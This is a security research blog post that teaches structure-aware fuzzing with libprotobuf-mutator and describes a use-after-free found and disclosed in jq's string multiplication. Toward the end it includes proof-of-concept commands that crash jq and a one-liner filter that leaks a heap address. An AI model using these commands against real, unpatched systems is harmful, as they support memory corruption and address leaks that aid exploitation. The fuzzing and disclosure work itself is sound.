ForAllSecure Blog

Learning About Structure-Aware Fuzzing and Finding JSON Bugs to Boot

Harrison Green
August 26, 2020


What do JSON, YAML, and HTTP have in common? They’re all examples of ubiquitous data serialization and transmission standards, making them great targets for testing with fuzzing. While fuzzing has found many bugs in these kinds of targets, they all have requirements for structure in order for data to be considered “valid.” Handling these structure requirements intelligently is the key to finding the next level of bugs that others may have missed!

During my internship at ForAllSecure I had the chance to experiment with structure-aware fuzzing. This type of fuzzing is very exciting because it can efficiently explore targets that take complex, structured input such as JSON, XML, HTML, YAML, or even more complex structures such as PNG images.

I explored this concept by fuzzing JQ, a very popular JSON processor written in C. In fact, as of this writing it has 17,246 stars, making it the 19th most starred GitHub repository written in C! Using a structure-aware fuzzer in Mayhem, I was able to find several bugs (including a potentially remotely-exploitable use-after-free) that a simpler coverage-guided fuzzer could not find.

This post will describe when structure-aware fuzzing is useful, how to build a structure-aware fuzzer, and how I found a bug in my first week of fuzzing using this technique (which we disclosed to the maintainers on 14 February 2020).


  1. What is structure-aware fuzzing and what does it do better?
  2. How to build a structure-aware fuzzer with libprotobuf-mutator
  3. How I discovered a use-after-free (UAF) in JQ
  4. Details of the JQ UAF in f_multiply()


Part 1: What is structure-aware fuzzing and what does it do better?

With normal coverage-guided fuzzing like we see with AFL and libFuzzer, we capture information about how the target responds to our input (such as edge coverage, instruction counting, etc.). This feedback from the target enables coverage-guided fuzzers to guide their search to discover inputs that reach new parts of the program. The intuition here is that by slightly modifying, or “mutating” in fuzzer terminology, the data in our input, we might take a similar execution path in the target binary. So if we find an interesting new input, we can mutate it to explore the execution space around it.

This is usually a very effective technique, and it is excellent at finding bugs in data parsers, but in certain scenarios it may not be very efficient. If your target has strict validity requirements, or if you are trying to find deep bugs in how valid inputs are processed, standard mutation strategies (such as flipping bits) will spend most of the time generating invalid inputs which aren’t useful. Structure-aware fuzzing is when we build these requirements into the fuzzer, ensuring that the generated inputs meet them. To illustrate with a non-code example:

If we compare fuzzing to playing the classic game “Battleship,” a “dumb” fuzzer is like calling shots without knowing if our previous shots were “hits” or “misses”. Its strategy is just to shoot around blindly. With coverage-guided fuzzing, on the other hand, we know if our previous shots were “hits” or “misses” and once we get a “hit” we know to look at nearby tiles for the rest of the ship. 

Now if we think about how we provide input in a game of Battleship, we know that all of our inputs (shots) have to be in the format of a letter followed by a number, such as “A1” or “C6”. Since the board only has 10 rows and columns, the letters must be between A and J and the numbers between 1 and 10. A structure-aware fuzzer would know to only specify inputs using one of those letters, followed by one of those numbers, while a normal coverage-guided fuzzer would mutate inputs into potentially invalid strings such as “AAAA”, “99B”, or “!@#$”. If you immediately lost the game every time your fuzzer specified a shot that didn’t follow the rules, a coverage-guided fuzzer would rack up a lot of needless losses.

So how do we know when to use structure-aware fuzzing and what does it look like? Typically fuzzing is fairly simple when we have a target function that accepts raw bytes like:

void fuzz_me(char *data)

But sometimes we have a more complex signature such as: 

void fuzz_something(char *s, int a, int b, int c)

Or perhaps, we have a function that accepts raw bytes, but internally it expects well-formatted data such as in the case below. If there are reasonable structure checks such as internal data references, lengths, or checksums, we will spend a lot of time getting caught in the valid_image function and it will be hard to explore the state space of process_image.

void fuzz_image(char *img_data) {
    if (valid_image(img_data)) process_image(img_data);
}

Structure-aware fuzzing can help in both situations. The idea is to constrain our input space to semantically or structurally valid data. When we do this, we can fuzz functions that expect structured data.

Writing a basic structure-aware fuzzer just requires that we can generate random inputs of a certain type. For example, if we want to fuzz a function like the previously-mentioned fuzz_something(char *s, int a, int b, int c) we’d want something like the following pseudocode:

void fuzzer(input) {
    const char *s = input.get_string();
    int a = input.get_int();
    int b = input.get_int();
    int c = input.get_int();
    fuzz_something(s, a, b, c);
}


But how do we implement the get_string() and get_int() functions and take advantage of coverage-guided fuzzing? A common approach is to treat the input as a random byte stream that the fuzzer will populate and pull values out of the stream. This kind of approach is fairly easy to set up using existing libraries and works well for simple examples like above. However, as we start dealing with more complex data structures, the standard mutations in coverage-guided fuzzers become less useful and more destructive.

Why is this? Essentially, we are deserializing the input stream from a specific format. For example, the data might be packed like so:

[ s_length | s_data ... | a | b | c ]

Notice how we are very unlikely to generate a mutation that will change the length of string s while preserving the values of a, b, and c. As soon as we change how that one element of the input is parsed, we might affect how everything after it is parsed. If our target does something like the following:

void fuzz_something(const char *s, int a, int b, int c) {
    if (a == 0xdeadbeef && b == 0x11111111 && c == 0x22222222) {
        if (strlen(s) == 100) __builtin_trap();
    }
}

Coverage-guided fuzzing will allow us to quickly satisfy the first if-condition and find the correct values for a, b, and c. However, as soon as we change the length of string s, we will change the input stream values that follow the string and need to repeat our work to find values for a, b, and c. A structure-aware approach would be to appropriately adjust s_length any time we add or remove bytes in s_data, and to keep the length the same if we’re only modifying the contents. This is perhaps a contrived example, but hopefully it serves to demonstrate why this type of structure-aware fuzzing becomes more efficient for more complex structure types.

So to fuzz some targets efficiently we need not only well-structured inputs but also structure-aware mutations. This is where libprotobuf-mutator can help us.

Part 2: How to build a structure-aware fuzzer with libprotobuf-mutator

Libprotobuf-mutator (or LPM) is a library to randomly mutate protocol buffers. It can be combined with libFuzzer to create a structure-aware, coverage-guided fuzzer. As the name suggests, LPM mutates Protocol Buffers (aka protobufs).

Protobufs are a platform-neutral serialization format that can be used to serialize structured data types. In this language, an object is called a message. These messages can have fields of simple types like int or float, or they can contain other messages (even recursively).

The key idea in LPM is that our fuzzer input is no longer a raw byte sequence; instead, it is an instance of a protobuf object. Instead of deserializing a raw byte stream, we are simply reading a protobuf object. The primary benefit of using LPM in a fuzzer is that the fuzzer can mutate the protobuf object directly (by changing values and adding or removing messages) in order to preserve the overall structure. In this way, our fuzzer respects the high-level structure of our data and can mutate components independently.

So to harness our previous example, we can define a simple protobuf object like the following:

syntax = "proto3";

message MyInput {
    string s = 1;
    int32 a = 2;
    int32 b = 3;
    int32 c = 4;
}

Then we can use the libprotobuf-mutator DEFINE_PROTO_FUZZER macro to set up a libFuzzer entrypoint and consume our protobuf object:

DEFINE_PROTO_FUZZER(const MyInput& input) {
    const char *s = input.s().c_str();
    int a = input.a();
    int b = input.b();
    int c = input.c();
    fuzz_something(s, a, b, c);
}


In practice, this type of bug is found within a few seconds of running the harness. In addition, since we compile this harness into a standard libFuzzer executable, we can run it inside of Mayhem to take advantage of scaling, corpus management, and crash deduplication.

Now let’s examine structure-aware fuzzing on a more complex target.

Part 3: How I discovered a UAF in JQ

JQ is the project that builds the command line tool for JSON processing named jq. The tool takes JSON input and allows you to define “filters” that operate on the data. These filters are typically short programs, but they can become complex by stringing filters together (as in sed or awk).

From a high-level view, a good entrypoint to fuzz is essentially the main function, where the code processes a JSON string and a filter string from the command line. This is pretty easy to fuzz, since it just takes two strings. However, after some inspection of the code, we see that both strings are first validated. Essentially the code does something like:

void jq_main(const char *json, const char *filter) {
    jv input = jv_parse(json);
    if (!jv_is_valid(input)) exit(-1);
    jq_state *jq = jq_init();
    if (!jq_compile(jq, filter)) exit(-1);

    jq_start(jq, input, 1);
}

If we pass improperly structured data, we will never reach the interesting part of execution which happens after jq_start.

Note: if we are actually interested in fuzzing jv_parse or jq_compile, it would very much make sense to use raw byte coverage-guided fuzzers on these functions. However, for this demo, we are trying to uncover bugs that occur during the execution of these filters.

To fuzz this kind of target, we can define a grammar for JSON and JQ filters as a protobuf spec and then write a conversion function to build a well-structured string for each input. For example, our fuzz harness would look like this:

DEFINE_PROTO_FUZZER(const MyInput& input) {
    const JSON_value json = input.json();
    const JQ_program filter = input.filter();

    const char *json_string = JSON_to_string(json);
    const char *filter_string = JQ_to_string(filter);

    jq_main(json_string, filter_string);
}

Note: since the libprotobuf-mutator macro expects a single protobuf object as input, we can just define an input message that contains a JSON object and a JQ filter object like so:

message JQ_both {
    JSON_value json = 1;
    JQ_program filter = 2;
}

Our JSON grammar looks like:

syntax = "proto3";

message JSON_value {
    oneof value {
        JSON_object obj = 1;
        JSON_array arr = 2;
        JSON_number num = 3;
        JSON_true true = 4;
        JSON_false false = 5;
        JSON_null null = 6;
        string str = 7;
    }
}

message JSON_object {
    repeated JSON_key_value_pair entries = 1;
}

message JSON_key_value_pair {
    string key = 1;
    JSON_value value = 2;
}

message JSON_array {
    repeated JSON_array_item items = 1;
}

message JSON_array_item {
    JSON_value value = 1;
}

message JSON_number {
    oneof value {
        int64 long = 1;
        double double = 2;
    }
}

message JSON_true {}
message JSON_false {}
message JSON_null {}

The goal here is not to explicitly match a formal definition of JSON. Instead we just need to define a grammar that can generate a variety of inputs that will all be accepted by a JSON parser.

In order to use this in our harness, we also need to define a function to convert the type defined by our protobuf spec (JSON_value) to a string, the type our target expects. Due to the recursive nature of how we defined our protobuf format, I found it useful to define a utility class JSONWriter that recursively constructs a string when it is initialized. Then the conversion function (which we creatively called JSON_value_to_string()) just has to construct the object and get the output string from the writer object. Here is a snippet from the implementation:

std::string JSON_value_to_string(const JSON_value &json_value) {
    JSONWriter writer(json_value);
    return writer.to_string();
}

class JSONWriter {
public:
    JSONWriter(const JSON_value &json_value);
    std::string to_string();

private:
    void _write_JSON_value(const JSON_value &json_value);
    void _write_JSON_object(const JSON_object &obj);
    void _write_JSON_array(const JSON_array &arr);
    void _write_JSON_number(const JSON_number &num);
    void _write_string(const std::string s);

    std::ostringstream _out;
};

JSONWriter::JSONWriter(const JSON_value &json_value) {
    _write_JSON_value(json_value);
}

void JSONWriter::_write_JSON_value(const JSON_value &json_value) {
    switch (json_value.value_case()) {
        case JSON_value::kObj :
            _write_JSON_object(json_value.obj());
            break;
        case JSON_value::kArr :
            _write_JSON_array(json_value.arr());
            break;
        case JSON_value::kNum :
            _write_JSON_number(json_value.num());
            break;
        case JSON_value::kTrue :
            _out << "true";
            break;
        case JSON_value::kFalse :
            _out << "false";
            break;
        case JSON_value::kNull :
            _out << "null";
            break;
        case JSON_value::kStr :
            _write_string(json_value.str());
            break;
        default:
            _out << "null";
            break;
    }
}

std::string JSONWriter::to_string() {
    return _out.str();
}
In order to visualize what we’re generating, we can define a separate standalone fuzzer that just takes a JSON_value, unpacks it, and prints out the corresponding string.

DEFINE_PROTO_FUZZER(const JSON_value& val) {
    std::string str = JSON_value_to_string(val);
    std::cout << str << std::endl;
}

Here are some examples of generated inputs from when I first put this together:

{"": [2.52962e-321]}
{"": []}
["", [{"": []}, "", , []], []]
["", [{"": true}, "", , []], []]
["", [{"": true}, "", , null], []]
["", [{"": true}, "", , ""], []]
["", [{"": ""}, "", , ""], []]
{"": "", "": ""}
{"": "", "": "", "": ""}
{"": "", "": "", "": 0}
{"": "", "": "", "": 0, ")": ""}
{"": "", "": [""]}
{"": [{"": [{"": [{"": [false]}]}, false]}]}
{"": [{"": [{"": [{"": [9.7347e-309, false]}]}, false]}]}
{"": [{"": [{"": [""]}, false]}]}

I went through a very similar process to define a grammar for JQ filters (which is a bit too big to embed in this blog post) and it generated filters like the following:


There are a few more relevant details to using LPM efficiently (especially related to protobuf default values), but we don’t have space to cover them here. You can refer to our GitHub repository to see a stripped-down version of the fuzzer that quickly reproduces one of the bugs I found in JQ.

Part 4: Details of the JQ UAF in f_multiply()

Using the protobuf specifications from the previous section, I was able to build a structure-aware coverage-guided fuzzer to explore the behavior of JQ. I ran the fuzzer inside of Mayhem and quickly found some crashing test cases. Specifically, I found several (uninteresting) ways to crash the program with assertion errors as well as a more interesting use-after-free bug.

In JQ there is the concept of string multiplication, where something like “abc” * 3 should produce “abcabcabc”. One of the crashing test cases included a string that was being multiplied by some large number. I was able to reproduce it with a smaller test case such as the following:

$ echo -ne "\"abcd\"" | jq '. * 3'

This produces the correct result (“abcdabcdabcd”); however, if we run this on a version of jq compiled with AddressSanitizer, we get the following trace:

==54==ERROR: AddressSanitizer: heap-use-after-free on address 0x60300000e570 at pc 0x0000005cd728 bp 0x7ffcd28a6e40 sp 0x7ffcd28a6e38
READ of size 1 at 0x60300000e570 thread T0
    #0 0x5cd727 in jvp_utf8_next /src/jq-asan/src/jv_unicode.c:35:40
    #1 0x5cdc73 in jvp_utf8_is_valid /src/jq-asan/src/jv_unicode.c:79:16
    #2 0x568c76 in jv_string_append_buf /src/jq-asan/src/jv.c:1140:7
    #3 0x675cf7 in f_multiply /src/jq-asan/src/builtin.c:328:13
    #4 0x533f09 in jq_next /src/jq-asan/src/execute.c:858:21
    #5 0x51fab0 in process /src/jq-asan/src/main.c:180:31
    #6 0x51dc95 in main /src/jq-asan/src/main.c:677:15
    #7 0x7f26e1246b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #8 0x41b599 in _start (/usr/asan/bin/jq+0x41b599)

After some digging, I found the relevant code in f_multiply in builtin.c:

int n;
size_t alen = jv_string_length_bytes(jv_copy(str));
jv res = str;

for (n = jv_number_value(num) - 1; n > 0; n--)
  res = jv_string_append_buf(res, jv_string_value(str), alen);

Here num is set to 3 and str is our original template string “abcd”. The for loop simply iterates n-1 times and appends our template string to res, which is saved as the result.

The bug is that jv_string_append_buf may free and reallocate the string buffer if it runs out of space to append characters. Normally this wouldn’t be a problem. However in this case res is simply a shallow copy of the template string: (jv res = str). The template string ends up being freed in the second iteration of the loop yet we keep reading from it in subsequent iterations, hence “use after free”.

If we use a large enough string we can embed corrupted data into the resulting string which causes jq to crash when it tries to print invalid utf-8 characters:

python -c "print('\"' + 'a'*1100 + '\"')" | jq '.*5'

Alternatively, if we have more control over the filter, we can extract and leak a heap address (which reveals information about the internal address space of the program) with this nifty one-liner:

jq -n -c '"a"*2000 | .*7 | explode | .[8000:8008] | reverse | map(if (.<0) then (.+256) else (.) end) | map((./16|floor), .%16) | map(["0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f"][.]) | join("")'

Hopefully we’ve reinforced that fuzzing is an effective way to discover vulnerabilities or unintended behaviours in software, and with some creativity and application of techniques we can test code that otherwise would be unproductive to fuzz. We gave a brief intro to structure-aware fuzzing and demonstrated how to build your own structure-aware fuzzer with libprotobuf-mutator, with an example against a real-world target. If you’re interested in playing around with the code or reproducing the UAF bug, you can check out our open-source Vulnerability Labs repository.

As I hope this post demonstrated, structure-aware fuzzing is a very powerful technique to find vulnerabilities in targets with structured data. While this post demonstrated how to work with JSON data, the same ideas can be applied to any other target with requirements for well-formed data in order to find deep bugs that others might miss.

This isn’t to say that you shouldn’t try to find low-hanging fruit with coverage-guided fuzzing. Mayhem allows users to run multiple fuzzers simultaneously while sharing a corpus, taking advantage of the strengths of each. For example, you could pair the efficiency of a structure-aware fuzzer with the unlimited exploration of a standard coverage-guided fuzzer or the analytical power of symbolic execution. If you’re interested in learning how to integrate these techniques into testing your code, reach out to one of our security experts.
